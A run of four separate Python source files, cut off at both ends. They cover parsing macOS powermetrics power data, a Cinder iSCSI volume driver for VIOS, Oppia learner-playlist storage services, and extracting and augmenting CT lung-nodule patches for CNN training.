return plistlib.readPlistFromString(plist_string)
except xml.parsers.expat.ExpatError:
return None
@staticmethod
def ParsePowerMetricsOutput(powermetrics_output):
"""Parse output of powermetrics command line utility.
Returns:
Dictionary in the format returned by StopMonitoringPower() or None
if |powermetrics_output| is empty - crbug.com/353250 .
"""
if len(powermetrics_output) == 0:
logging.warning('powermetrics produced zero length output')
return None
# Container to collect samples for running averages.
# out_path - list containing the key path in the output dictionary.
# src_path - list containing the key path to get the data from in
# powermetrics' output.
def ConstructMetric(out_path, src_path):
RunningAverage = collections.namedtuple('RunningAverage', [
'out_path', 'src_path', 'samples'])
return RunningAverage(out_path, src_path, [])
# List of RunningAverage objects specifying metrics we want to aggregate.
metrics = [
ConstructMetric(
['component_utilization', 'whole_package', 'average_frequency_hz'],
['processor', 'freq_hz']),
ConstructMetric(
['component_utilization', 'whole_package', 'idle_percent'],
['processor', 'packages', 0, 'c_state_ratio'])]
def DataWithMetricKeyPath(metric, powermetrics_output):
"""Retrieve the sample from powermetrics' output for a given metric.
Args:
metric: The RunningAverage object we want to collect a new sample for.
powermetrics_output: Dictionary containing powermetrics output.
Returns:
The sample corresponding to |metric|'s keypath."""
# Get actual data corresponding to key path.
out_data = powermetrics_output
for k in metric.src_path:
out_data = out_data[k]
assert type(out_data) in [int, float], (
'Was expecting a number: %s (%s)' % (type(out_data), out_data))
return float(out_data)
sample_durations = []
total_energy_consumption_mwh = 0
# powermetrics outputs multiple plists separated by null terminators.
raw_plists = powermetrics_output.split('\0')
raw_plists = [x for x in raw_plists if len(x) > 0]
assert len(raw_plists) == 1
# -------- Examine contents of first plist for systems specs. --------
plist = PowerMetricsPowerMonitor._ParsePlistString(raw_plists[0])
if not plist:
logging.warning('powermetrics produced invalid output, output length: '
'%d', len(powermetrics_output))
return {}
# Powermetrics doesn't record power usage when running on a VM.
hw_model = plist.get('hw_model')
if hw_model and hw_model.startswith('VMware'):
return {}
if 'GPU' in plist:
metrics.extend([
ConstructMetric(
['component_utilization', 'gpu', 'average_frequency_hz'],
['GPU', 0, 'freq_hz']),
ConstructMetric(
['component_utilization', 'gpu', 'idle_percent'],
['GPU', 0, 'c_state_ratio'])])
# There's no way of knowing ahead of time how many cpus and packages the
# current system has. Iterate over cores and cpus - construct metrics for
# each one.
if 'processor' in plist:
core_dict = plist['processor']['packages'][0]['cores']
num_cores = len(core_dict)
cpu_num = 0
for core_idx in xrange(num_cores):
num_cpus = len(core_dict[core_idx]['cpus'])
base_src_path = ['processor', 'packages', 0, 'cores', core_idx]
for cpu_idx in xrange(num_cpus):
base_out_path = ['component_utilization', 'cpu%d' % cpu_num]
# C State ratio is per-package, component CPUs of that package may
# have different frequencies.
metrics.append(ConstructMetric(
base_out_path + ['average_frequency_hz'],
base_src_path + ['cpus', cpu_idx, 'freq_hz']))
metrics.append(ConstructMetric(
base_out_path + ['idle_percent'],
base_src_path + ['c_state_ratio']))
cpu_num += 1
# -------- Parse Data Out of Plists --------
plist = PowerMetricsPowerMonitor._ParsePlistString(raw_plists[0])
if not plist:
logging.error('Error parsing plist.')
return {}
# Duration of this sample.
sample_duration_ms = int(plist['elapsed_ns']) / 10 ** 6
sample_durations.append(sample_duration_ms)
if 'processor' not in plist:
logging.error("'processor' field not found in plist.")
return {}
processor = plist['processor']
total_energy_consumption_mwh = (
(float(processor.get('package_joules', 0)) / 3600.) * 10 ** 3)
for m in metrics:
m.samples.append(DataWithMetricKeyPath(m, plist))
# -------- Collect and Process Data --------
out_dict = {}
out_dict['identifier'] = 'powermetrics'
out_dict['energy_consumption_mwh'] = total_energy_consumption_mwh
def StoreMetricAverage(metric, sample_durations, out):
"""Calculate average value of samples in a metric and store in output
path as specified by metric.
Args:
metric: A RunningAverage object containing samples to average.
sample_durations: A list which parallels the samples list containing
the time slice for each sample.
out: The output dicat, average is stored in the location specified by
metric.out_path.
"""
if len(metric.samples) == 0:
return
assert len(metric.samples) == len(sample_durations)
avg = 0
for i in xrange(len(metric.samples)):
avg += metric.samples[i] * sample_durations[i]
avg /= sum(sample_durations)
# Store data in output, creating empty dictionaries as we go.
for k in metric.out_path[:-1]:
if not out.has_key(k):
out[k] = {}
out = out[k]
out[metric.out_path[-1]] = avg
for m in metrics:
StoreMetricAverage(m, sample_durations, out_dict)
return out_dict
def _KillPowerMetricsProcess(self):
"""Kill a running powermetrics process."""
try:
self._powermetrics_process.terminate()
except OSError:
# terminate() can fail when Powermetrics does not have the SetUID set.
self._backend.LaunchApplication(
'/usr/bin/pkill',
['-SIGTERM', os.path.basename(self.binary_path)],
elevate_privilege=True)
def StopMonitoringPower(self):
assert self._powermetrics_process, (
'StartMonitoringPower() not called.')
# Tell powermetrics to take an immediate sample.
try:
self._KillPowerMetricsProcess()
(power_stdout, power_stderr) = self._powermetrics_process.communicate()
returncode = self._powermetrics_process.returncode
assert returncode in [0, -15], (
"""powermetrics error
return code=%d
stdout=(%s)
stderr=(%s)""" % (returncode, power_stdout, power_stderr))
with open(self._output_filename, 'rb') as output_file:
powermetrics_output = output_file.read()
return PowerMetricsPowerMonitor.ParsePowerMetricsOutput(
powermetrics_output)
finally:
shutil.rmtree(self._output_directory)
self._output_directory = None
self._output_filename = None
self._powermetrics_process = None
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Driver for aix servers running ISCSI.
"""
import socket
from oslo.config import cfg
from cinder import exception
from cinder import db as db_api
from cinder import units
from cinder import utils
from cinder.volume import iscsi
from cinder.volume import utils as volutils
from cinder.volume import volume_types
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils
from cinder.openstack.common import uuidutils
from cinder.openstack.common.db import exception as db_exc
from paxes_cinder.volume.drivers.vios import vios_iscsi as vios_iscsi
from paxes_cinder.volume.drivers.vios import vios_lvm as driver
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class VIOSLVMISCSIDriver(driver.VIOSLVMDriver, vios_iscsi.VIOSISCSIDriver):
def __init__(self, *args, **kwargs):
self.db = kwargs.get('db')
self.target_helper = self.get_target_helper(self.db)
super(VIOSLVMISCSIDriver, self).__init__(*args, **kwargs)
self.backend_name =\
self.configuration.safe_get('volume_backend_name') or 'LVM_iSCSI'
self.protocol = 'viSCSI'
self.target_name = self.configuration.safe_get('host') or uuidutils.generate_uuid()[8]
def set_execute(self, execute):
super(VIOSLVMISCSIDriver, self).set_execute(execute)
if self.target_helper is not None:
self.target_helper.set_execute(execute)
# def do_setup(self, ctxt):
# LOG.debug('enter: do_setup')
# self._context = ctxt
# # Ensure that the default volume type exists
# vtn = self.configuration.default_volume_type
# vtn = vtn.decode('utf-8') if vtn else vtn
# try:
# volume_types.get_volume_type_by_name(ctxt, vtn)
# except exception.VolumeTypeNotFoundByName:
# # If the default volume type does not exist, we create it here.
# LOG.info(_("Creating default volume type '%s'") % vtn)
# self._create_default_volume_type(ctxt, vtn)
#
# LOG.debug('leave: do_setup')
#
# def _create_default_volume_type(self, context, volume_type_name):
# """Internal Helper Method to Create a Default Volume Type for Host"""
# ##vbn = self.configuration.volume_backend_name
#
# extra_specs = {}
# extra_specs['drivers:display_name'] = volume_type_name
# ##extra_specs['capabilities:volume_backend_name'] = vbn
#
# def voltype_create(name, extra_specs):
# """ Don't use volume_type.create during init_host"""
# try:
# type_ref = db_api.volume_type_create(
# context, dict(name=name, extra_specs=extra_specs))
# except db_exc.DBError as e:
# LOG.exception(_('DB error: %s') % e)
# raise exception.VolumeTypeCreateFailed(
# name=name, extra_specs=extra_specs)
# return type_ref
#
# return voltype_create(volume_type_name, extra_specs)
def initialize_connection(self, volume, connector):
volume_name = volume['name'][0:15]
target_name = '%s:%s' % (connector['initiator'], volume_name)
#target_name = '%s:%s' % (connector['initiator'], self.target_name)
volume_type = self.protocol.lower()
properties = {}
properties['target_portal'] = '%s:%s' % (CONF.iscsi_ip_address, CONF.iscsi_port)
properties['target_iqn'] = target_name
target, lun_id = self._create_export('', target_name, volume_name)
properties['target_name'] = target
properties['target_lun'] = lun_id
properties['volume_id'] = volume['id']
return {'driver_volume_type': volume_type, 'data': properties, }
def terminate_connection(self, volume, connector, **kwargs):
volume_name = volume["name"][0:15]
iqn = '%s:%s' % (connector['initiator'], volume_name)
self._remove_export(volume_name, iqn)
##def create_export(self, context, volume):
## """Creates an export for a logical volume."""
## return self._create_export(context, volume)
def create_volume(self, volume):
#self._create_export("", "volume-7b7cdd64")
"""Creates a logical volume."""
mirror_count = 0
if self.configuration.lvm_mirrors:
mirror_count = self.configuration.lvm_mirrors
self._create_volume(volume['name'],
self._sizestr(volume['size']),
self.configuration.lvm_type,
mirror_count)
def _create_export(self, context, iscsi_name, volume_name):
"""Creates an export for a logical volume."""\
##iscsi_name = "%s%s" % (CONF.iscsi_target_prefix,
## volume['name'])
target = self.create_vios_iscsi_target(iscsi_name=iscsi_name, volume_name=volume_name)
lun = None
if target:
lun = self.export_vios_iscsi_target(target=target, volume_name=volume_name)
return target, lun
def _remove_export(self, volume_name, iqn):
'''
Delete the lu
'''
lu = self.get_lu_by_volume(volume_name)
##Remove the lu
self.remove_dev(lu)
##Remove the target
target = self.get_target_by_iqn(iqn)
self.remove_dev(target)
## def remove_export(self, context, volume):
## return self.remove_dev(volume)
## def ensure_export(self, context, volume):
## volume_name = volume['name']
## result = self.ensure_vios_export(volume_name)
## if result:
## self.db.volume_update(context, volume['id'], model_update) ##need update
def get_target_helper(self, db):
root_helper = utils.get_root_helper()
##CONF.iscsi_helper == 'tgtadm':
return iscsi.TgtAdm(root_helper,
CONF.volumes_dir,
CONF.iscsi_target_prefix,
db=db)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
mirror_count = 0
if self.configuration.lvm_mirrors:
mirror_count = self.configuration.lvm_mirrors
LOG.info(_('Creating clone of volume: %s') % src_vref['id'])
volume_name = src_vref['name']
temp_id = 'tmp-snap-%s' % volume['id']
temp_snapshot = {'name': volume_name,
'size': src_vref['size'],
'volume_size': src_vref['size'],
'snap_name': 'clone-snap-%s' % volume['id'],
'id': temp_id}
#self.create_snapshot(temp_snapshot)
self._create_volume(volume['name'],
self._sizestr(volume['size']),
self.configuration.lvm_type,
mirror_count)
#self.vg.activate_lv(temp_snapshot['name'], is_snapshot=True)
# copy_volume expects sizes in MiB, we store integer GiB
# be sure to convert before passing in
try:
self.copy_volume(
self.local_path(temp_snapshot),
self.local_path(volume),
src_vref['size'] * units.KiB,
self.configuration.volume_dd_blocksize,
execute=self._execute)
finally:
#self.delete_snapshot(tmp_snapshot)
pass
| |
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Services for the learner playlist feature of the learner dashboard."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import subscription_services
from core.domain import user_domain
from core.platform import models
import feconf
(user_models,) = models.Registry.import_models([models.NAMES.user])
MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT = (
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT)
def get_learner_playlist_from_model(learner_playlist_model):
"""Returns the learner playlist domain object given the learner playlist
model loaded from the datastore.
Args:
learner_playlist_model: LearnerPlaylistModel. The
learner playlist model from the datastore.
Returns:
LearnerPlaylist. The learner playlist domain object corresponding to the
given model.
"""
return user_domain.LearnerPlaylist(
learner_playlist_model.id,
learner_playlist_model.exploration_ids,
learner_playlist_model.collection_ids)
def save_learner_playlist(learner_playlist):
"""Save a learner playlist domain object as an LearnerPlaylistModel entity
in the datastore.
Args:
learner_playlist: LearnerPlaylist. The learner playlist domain object to
be saved in the datastore.
"""
learner_playlist_dict = {
'exploration_ids': learner_playlist.exploration_ids,
'collection_ids': learner_playlist.collection_ids
}
learner_playlist_model = (user_models.LearnerPlaylistModel.get_by_id(
learner_playlist.id))
if learner_playlist_model is not None:
learner_playlist_model.populate(**learner_playlist_dict)
learner_playlist_model.put()
else:
learner_playlist_dict['id'] = learner_playlist.id
user_models.LearnerPlaylistModel(**learner_playlist_dict).put()
def mark_exploration_to_be_played_later(
user_id, exploration_id, position_to_be_inserted=None):
"""Adds the exploration id to the learner playlist of the user at the given
position. If the position is not specified, the exploration gets added at
the end. If the exploration is created or has been edited by the user it is
not added as these appear on the creator dashboard of the creator. The
maximum limit of the learner playlist is
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT. If the count exceeds
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT, the exploration is not added.
Args:
user_id: str. The id of the user.
exploration_id: str. The id of the exploration to be added to the
learner playlist.
position_to_be_inserted: int|None. If this is specified the exploration
gets inserted at the given position. Otherwise it gets added at the
end.
Returns:
(bool, bool). The first boolean indicates whether the playlist limit
of the user has been exceeded, and the second boolean indicates
whether the exploration is among one of the created or edited
explorations of the user.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if not learner_playlist_model:
learner_playlist_model = (
user_models.LearnerPlaylistModel(id=user_id))
subscribed_exploration_ids = (
subscription_services.get_exploration_ids_subscribed_to(user_id))
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
playlist_limit_exceeded = False
exp_belongs_to_subscribed_explorations = False
if exploration_id not in subscribed_exploration_ids:
exploration_ids_count = len(learner_playlist.exploration_ids)
if position_to_be_inserted is None:
if exploration_id not in learner_playlist.exploration_ids:
if exploration_ids_count < MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT:
learner_playlist.add_exploration_id_to_list(exploration_id)
else:
playlist_limit_exceeded = True
else:
if exploration_id not in learner_playlist.exploration_ids:
if exploration_ids_count < MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT:
learner_playlist.insert_exploration_id_at_given_position(
exploration_id, position_to_be_inserted)
else:
playlist_limit_exceeded = True
else:
learner_playlist.remove_exploration_id(exploration_id)
learner_playlist.insert_exploration_id_at_given_position(
exploration_id, position_to_be_inserted)
save_learner_playlist(learner_playlist)
else:
exp_belongs_to_subscribed_explorations = True
return playlist_limit_exceeded, exp_belongs_to_subscribed_explorations
def mark_collection_to_be_played_later(
user_id, collection_id, position_to_be_inserted=None):
"""Adds the collection id to the learner playlist of the user at the given
position. If the position is not specified, the collection gets added at
the end. If the collection is created or has been edited by the user it is
not added as these appear on the creator dashboard of the creator. The
maximum limit of the learner playlist is
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT. If the count exceeds
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT, the collection is not added.
Args:
user_id: str. The id of the user.
collection_id: str. The id of the collection to be added to the
learner playlist.
position_to_be_inserted: int|None. If this is specified the collection
gets inserted at the given position. Otherwise it gets added at
the end.
Returns:
(bool, bool). The first boolean indicates whether the playlist limit of
the user has been exceeded, and the second boolean indicates whether the
collection is among one of the created or edited collections of the
user.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if not learner_playlist_model:
learner_playlist_model = (
user_models.LearnerPlaylistModel(id=user_id))
subscribed_collection_ids = (
subscription_services.get_collection_ids_subscribed_to(user_id))
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
playlist_limit_exceeded = False
collection_belongs_to_subscribed_collections = False
if collection_id not in subscribed_collection_ids:
collection_ids_count = len(learner_playlist.collection_ids)
if position_to_be_inserted is None:
if collection_id not in learner_playlist.collection_ids:
if collection_ids_count < MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT:
learner_playlist.add_collection_id_to_list(collection_id)
else:
playlist_limit_exceeded = True
else:
if collection_id not in learner_playlist.collection_ids:
if collection_ids_count < MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT:
learner_playlist.insert_collection_id_at_given_position(
collection_id, position_to_be_inserted)
else:
playlist_limit_exceeded = True
else:
learner_playlist.remove_collection_id(collection_id)
learner_playlist.insert_collection_id_at_given_position(
collection_id, position_to_be_inserted)
save_learner_playlist(learner_playlist)
else:
collection_belongs_to_subscribed_collections = True
return playlist_limit_exceeded, collection_belongs_to_subscribed_collections
def remove_exploration_from_learner_playlist(user_id, exploration_id):
"""Removes the exploration from the learner playlist of the user
(if present).
Args:
user_id: str. The id of the user.
exploration_id: str. The id of the exploration to be removed.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if learner_playlist_model:
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
if exploration_id in learner_playlist.exploration_ids:
learner_playlist.remove_exploration_id(exploration_id)
save_learner_playlist(learner_playlist)
def remove_collection_from_learner_playlist(user_id, collection_id):
"""Removes the collection from the learner playlist of the user
(if present).
Args:
user_id: str. The id of the user.
collection_id: str. The id of the collection to be removed.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if learner_playlist_model:
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
if collection_id in learner_playlist.collection_ids:
learner_playlist.remove_collection_id(collection_id)
save_learner_playlist(learner_playlist)
def get_all_exp_ids_in_learner_playlist(user_id):
"""Returns a list with the ids of all the explorations that are in the
playlist of the user.
Args:
user_id: str. The id of the user.
Returns:
list(str). A list of the ids of the explorations that are in the
learner playlist of the user.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if learner_playlist_model:
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
return learner_playlist.exploration_ids
else:
return []
def get_all_collection_ids_in_learner_playlist(user_id):
"""Returns a list with the ids of all the collections that are in the
playlist of the user.
Args:
user_id: str. The id of the user.
Returns:
list(str). A list of the ids of the collections that are in the
learner playlist of the user.
"""
learner_playlist_model = user_models.LearnerPlaylistModel.get(
user_id, strict=False)
if learner_playlist_model:
learner_playlist = get_learner_playlist_from_model(
learner_playlist_model)
return learner_playlist.collection_ids
else:
return []
| |
###################################################################################################
#Sardar Hamidian 07-1-2016
#Reading dicom files and creating 3D-numpy patches both positive and negative (<3mm nodules NOT extracted)
#if you want to add more negative you should change the margin rand in line 179-183
#Input 3D numpy array of dicom files
#Output 3D small samples for feeding CNN model
#
###################################################################################################
import numpy as np
import os
import sys
import scipy.io as sio
from random import randint
#from skimage import io
from skimage import transform as tf
# Things to Do:
#X Change name of folders for output and output_aug so they reflect that they are for pos patches
#X Change folder naming programitcally based on patch_size
#X (Random per pos patch, so not known exactly) Put something reflecting how many negs are extracted per pos up here
#X Add new augmentation modes (contrast, shear, size, combo...); Perhaps should go in different folder s.t. effect of w/wo can
# be compared to see if there is any benefit from these augmentations.
#XShould we do .astype('int16') for cases that are uint16 right here? The patches do get read as int16
# in SupportFuncs, but not sure if that fixes any potential issues (e.g. for augmentation patches) or
# if int16 conversion should be done here. >>>Actually patches from crop_3d were written as float, so
# later in SupportFunc it is unnecessary for them to be read in as int16 and then float, they are already float;
# but full volume was being read as is, and now i added conversion to int16 right when it is read;
#X Something to help avoid re-extraction of patches for cases we already processed?
#X Wrong implementation: pos_nodules_in_each_case is being iteratively updated to include all the nodules;
# but the check of neg patches is done as this is still being loaded with new nodules; e.g. for first nodule,
# intersection is only checked against 1st nodule, then in iteration for 2nd nodule negatives are checked for
# intersection against both 1st and 2nd nodule, and so on; So the info on ALL nodules should be first loaded,
# and only then the intersection should be checked!
#
patch_size = (44,44,12) #(36,36,8)
patch_str = ''.join([str(x) for x in patch_size]) #e.g. get '28288' from (28,28,8)
transFlag = 1 #whether to also augment w transformed nodules; 0 will only augment w flip/rotate nodules; if 1, the transformed nodules written in separate directory
pos_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_' + patch_str)
neg_output_path = os.path.join('/diskStation/LIDC', patch_str, 'neg_smp_0_' + patch_str)
aug_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_0_' + patch_str)
aug_aux_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_aux_' + patch_str) #if transFlag==1, transformed nodules written to this
#pos_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_' + patch_str + '_test')
#neg_output_path = os.path.join('/diskStation/LIDC', patch_str, 'neg_smp_0_' + patch_str + '_test')
#aug_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_0_' + patch_str + '_test')
#aug_aux_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_aux_' + patch_str + '_test') #if transFlag==1, transformed nodules written to this
numpy_master_case_path='/diskStation/LIDC/LIDC_NUMPY_3d'
lidcPath='/raida/apezeshk/lung_dicom_dir/'
mat_pre='uniqueStats_'
lidc_case_list=os.listdir(numpy_master_case_path)
# lidc_sample=['p0049_20000101_s3000627.npy']
#This is the nodule class and keeps all the necessary information about each nodule
class can_nudul(object):
def __init__(self,case_id,x,y,z,x_size,y_size,z_size, avgCentroidX,avgCentroidY,avgCentroidZ,IURatio,ymarg=0,zmarg=0):
self.case_id=case_id
self.x=x #the way he passes the arguments, these 3 are minY, minX, minZ for that nodule in uniqueStats
self.y=y
self.z=z
self.x_size= x_size #the way he passes the arguments, these 3 are maxY, maxX, maxZ for that nodule in uniqueStats
self.y_size = y_size
self.z_size = z_size
self.avgCentroidX = avgCentroidX
self.avgCentroidY = avgCentroidY
self.avgCentroidZ = avgCentroidZ
self.IURatio=IURatio #if it is zero means nodule is smaller than 3mm
def cal_siz(self): #this caculates the size of the nodule
weight=(self.x_size-self.x+1)
height=(self.y_size-self.y+1)
depth=(self.z_size-self.z+1)
return (weight*height*depth)
def volum_size(self):# This returns the volum wieght,heigh and depth
return (self.x_size-self.x+1),(self.y_size-self.y+1),(self.z_size-self.z+1)
class can_nudul_pos_neg(object):#this is same as the other except it does not have the centroid info of the nodule
def __init__(self,x,y,z,x_size,y_size,z_size,IURatio=0):
self.x=x #the way he passes the arguments, these 3 are minY, minX, minZ for that nodule in uniqueStats
self.y=y
self.z=z
self.x_size= x_size #the way he passes the arguments, these 3 are maxY, maxX, maxZ for that nodule in uniqueStats
self.y_size = y_size
self.z_size = z_size
self.IURatio = IURatio
def cal_siz(self): #this caculates the size of the nodule
weight=(self.x_size-self.x+1)
height=(self.y_size-self.y+1)
depth=(self.z_size-self.z+1)
return (weight*height*depth)
def volum_size(self):# This returns the volum wieght,heigh and depth
return (self.x_size-self.x+1),(self.y_size-self.y+1),(self.z_size-self.z+1)
def path_creat(file_name):
spl_dir=file_name[:].replace('_','/')
return spl_dir
#def pick_from_volum(input_array,can_nudul):
# x=can_nudul.x
# y=can_nudul.y
# z=can_nudul.z
def crop_3d(xcen,ycen,zcen,input_np,x_viggle=patch_size[0]/2,yviggla=patch_size[1]/2,zviggla=patch_size[2]/2):
ArrayDicom = np.zeros(patch_size, dtype=float)
ArrayDicom[:,:,:]=input_np[(int(xcen)-int(x_viggle)):int(xcen)+int(x_viggle),(int(ycen)-int(yviggla)):(int(ycen)+int(yviggla)),(int(zcen)-int(zviggla)):(int(zcen)+int(zviggla))]
return ArrayDicom
#########################################################################
#this function does the data augmentation with flipping & rotating
# Seven possible conditions can be generated here
#Number of rotation(1-3) Flip number(1-2)
#########################################################################
def aug_mat(input_3d,aug_type=None,NumberofRotation=None,flipnumber=None):
if aug_type=='rotate':
rot_mat=np.rot90(input_3d,NumberofRotation)
return rot_mat
elif aug_type=='flip' and flipnumber==1:
flip_mat=np.fliplr(input_3d)
return flip_mat
elif aug_type=='flip' and flipnumber ==2:
flip_mat=np.flipud(input_3d)
return flip_mat
elif aug_type=='both' and flipnumber==1:
flip_rot=np.rot90(input_3d,NumberofRotation)
flip_mat=np.fliplr(flip_rot)
return flip_mat
elif aug_type=='both' and flipnumber==2:
flip_rot=np.rot90(input_3d,NumberofRotation)
flip_mat=np.flipud(flip_rot)
return flip_mat
elif aug_type=='both' and NumberofRotation==2 and flipnumber==1:
flip_mat = np.fliplr(np.flipud(np.rot90(input_3d, NumberofRotation)))
return flip_mat
else:
return input_3d
def save_aug_case(pth, matrix):
np.save(pth + "_r11", aug_mat(matrix, 'rotate', 1, 1))
np.save(pth + "_r31", aug_mat(matrix, 'rotate', 3, 1))
np.save(pth + "_r21", aug_mat(matrix, 'rotate', 2, 1))
np.save(pth + "_f11", aug_mat(matrix, 'flip', 1, 1))
np.save(pth + "_f12", aug_mat(matrix, 'flip', 1, 2))
np.save(pth + "_b11", aug_mat(matrix, 'both', 1, 1))
np.save(pth + "_b12", aug_mat(matrix, 'both', 1, 2))
np.save(pth + "_b21", aug_mat(matrix, 'both', 2, 1)) #NEW: added 4/26/2017
#########################################################################
#these functions do the data augmentation by applying various
#transformations (combo of rotation, size scaling, horizontal shear)
#########################################################################
#Takes THE RELEVANT SLICES, LOCATION OF NODULE, THEN APPL TRANSFORMATIONS WITH
#DIFFERENT PARAMETERS, AND SAVE THE TRANSFORMED PATCHES;
def crop_relevantSlices(zcen, input_np, patchSize):
#Returns slices of the ct that contain the nodule; number of slices returned
#is dictated by number of slices of "patchSize"; NOTE that the output is float, same
#situation as "crop_3d" fn.
relevantSlices = np.zeros((input_np.shape[0], input_np.shape[1], patchSize[2]), dtype=float)
zviggle = patchSize[2]/2
relevantSlices[:,:,:]=input_np[:, :,(int(zcen)-int(zviggle)):(int(zcen)+int(zviggle))]
return relevantSlices
def Aug_trans(relevantSlices, aug_transParams):
#Applies various transformations to full slices containing a nodule, then extracts the transformed nodule,
#and writes the transformed nodules to an output directory. Transformations are combo of rotation, size scale,
#& horizontal shear;
#Inputs: (the last 3 inputs listed below are within fields of aug_transParams)
# relevantSlices: full slices of ct containing a particular nodule, type float64, with same number of slices as patchSize[2]
# noduleCentroid: array containing centroid info of nodule (row,col,slice); used to locate it within relevantSlices
# patchSize: tuple containing patchSize info (3 elements, for height/width/slices)
# aug_transPath: pathname of folder to write the transformed nodules into
#Outputs:
# Will write all the transformed patches (based on how many elements in transParamArray) to an output directory
#Note: scikit.AffineTransform says rotation and shear are in radians, but if I give angle in degrees
#for rotation (e.g. -90) it will do the correct rotation (i.e. not in radians!!!) For shear it doesn't make any sense
#what is happening! It just applies horizontal shear, and it is not related to radians at all...
transParamArray = np.array([[-60, 0.75, -0.15],
[60, 1.25, 0.15],
[-120, 0.8, -0.2],
[120, 1.2, 0.2], #from your 2016 TMI paper, sans the contrast param; rotation/size scale/horizontal shear
[30, 1.15, 0.1],
[-30, 0.85, -0.1],
[-15, 0.9, -0.05],
[15, 1.1, 0.05]]) #and 4 new ones
noduleCentroid = aug_transParams['noduleCentroid']
patchSize = aug_transParams['patchSize']
aug_transPath = aug_transParams['aug_transPath']
case_id = aug_transParams['case_id'] #this is the patient identifier + '_' + (noduleTag - 1)
centerPoint = np.array((int(noduleCentroid[0]), int(noduleCentroid[1]))) #center point of nodule within the x/y plane: row,col
#rectPos: 1st two elements are row/col of top left of bbox centered on nodule; is used to find the
#coordinates of bbox and thereby centerpoint of nodule after the transformation, so that patch can
#be centered on correct location;
rectPos = [int(centerPoint[0]-0.5*patchSize[0]), int(centerPoint[1]-0.5*patchSize[1]),
patchSize[0], patchSize[1]]
array_int16 = np.zeros((2,2), dtype='int16') #just so that we can use its dtype to make sure relevantSlices also float64
#centerPoint = np.array((int(rectPos[0]+.5*rectPos[2]), int(rectPos[1]+.5*rectPos[3])))
for indParamArray in range(transParamArray.shape[0]):
angle = transParamArray[indParamArray, 0]
scaleFactor = transParamArray[indParamArray, 1]
shearFactor = transParamArray[indParamArray, 2]
#scaleFactor = 1.0
#shearFactor = 0.2
#angle = 30
#rectPos = [348, 296, 50, 50] #actual row/col of top left, and patchSize
for i in range(relevantSlices.shape[2]):
#For each slice, apply the current transformation parameters to full slices
currentSlice = relevantSlices[:,:,i]
if relevantSlices.dtype == array_int16.dtype:
#Rotation, etc. turn image into float and normalize to (0,1) if input is not float;
#In that case, you need to switch back to correct scale so you will need to know min/max;
#If image is already float, those operations will not affect image and it will retain its original range.
imageMin = currentSlice.min()
imageMax = currentSlice.max()
rotateImage = tf.rotate(currentSlice, angle=angle, resize=True) #note: Unlike matlab version, rotate around center; otherwise output image may clip parts of image
#rotateFake = tf.rotate(fakeImage, angle=angle, resize=True)
#rotateImage = tf.rotate(relevantSlices, angle=angle, resize=True, center=(centerPoint[1], centerPoint[0])) #note: center for fn is in matlab image coordinates, not row/col!!
#rotateFake = tf.rotate(fakeImage, angle=angle, resize=True, center=(centerPoint[1], centerPoint[0]))
tfScale = tf.AffineTransform(scale=(1.0/scaleFactor, 1.0/scaleFactor)) #for some reason affine trans takes inverse of desired transformation as input
scaleImage = tf.warp(rotateImage, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
#scaleFake = tf.warp(rotateFake, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
tfShear = tf.AffineTransform(shear = shearFactor)
shearImage = tf.warp(scaleImage, tfShear)
#shearFake = tf.warp(scaleFake, tfShear) #not using the output_size option, somehow the sheared image won't be centered in it
if i==0: #TO MAKE THINGS RUN FASTER, calculate UPDATED CENTERPOINTNEW ONLY FOR SINGLE SLICE
